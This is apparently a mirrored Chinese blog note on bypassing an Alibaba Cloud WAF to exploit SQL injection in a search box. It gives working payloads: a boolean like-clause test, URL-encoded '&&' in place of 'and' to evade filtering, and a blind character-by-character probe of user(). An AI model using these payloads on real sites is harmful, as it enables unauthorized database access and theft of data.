zoukankan      html  css  js  c++  java
  • 绕过阿里云waf进行SQL注入

    做个笔记吧,某SQL注入点的绕过,有阿里云waf的。

        首先遇到是个搜索框的注入点:

          演示下:

         

    针对搜索框,我们的sql语句一般是怎么写的?

        本地演示:select * from product where pname like '%华为%'

          

    我们如何进行注入判断?

    select * from product where pname like '%华为%' and 1=1 and '%%'='%%'

    select * from product where pname like '%华为%' and 1=2 and '%%'='%%'

          

    那么我们的sql注入payload就是:%' and 1=1 and '%%'='%

    我们尝试注入这段语句:

    直接遭到了拦截,我猜测可能是对and进行了过滤。不允许出现and

    在SQL注入测试中我们知道一个小技巧那就是

    and可以用&&进行替代。

    or可以用||进行替代。

      

    因为我们的注入类型是GET类型,所以我们要对&&进行url编码:

      然后构造如下payload:%' %26%26 1=1 %26%26 '%%'='%

        

    正确回显了数据,如果我们and 1=2呢:

    不显示信息,现在我们可以说这里是存在SQL注入的

    我们使用这种方法判断出存在注入,现在我们还要继续出数据,挖掘SQL注入漏洞最基本的得注入出user()或者是database()名字:

        我们对user()进行判断:

        输入payload:%' %26%26 user() like 'a%' %26%26 '%%'='%

    返回没有输出内容,说明我们的user()第一位不是a

    继续探测:

    直到输入o

        

    输出了正确的内容,说明user()第一位就是o。

    做个记录。。

        

  • 相关阅读:
    排序算法总结
    NAT协议 私有和公有ip如何相互转换。
    Redis的两种持久化方式
    分布式系统CAP理论
    常见容错机制:failover、failfast、failback、failsafe
    Redis分布式锁的正确实现方式
    Ticket机制
    微信小程序网络请求封装
    js+ajax 上传多图片,并删除
    js+ajax 上传单图片
  • 原文地址:https://www.cnblogs.com/piaomiaohongchen/p/10040196.html
Copyright © 2011-2022 走看看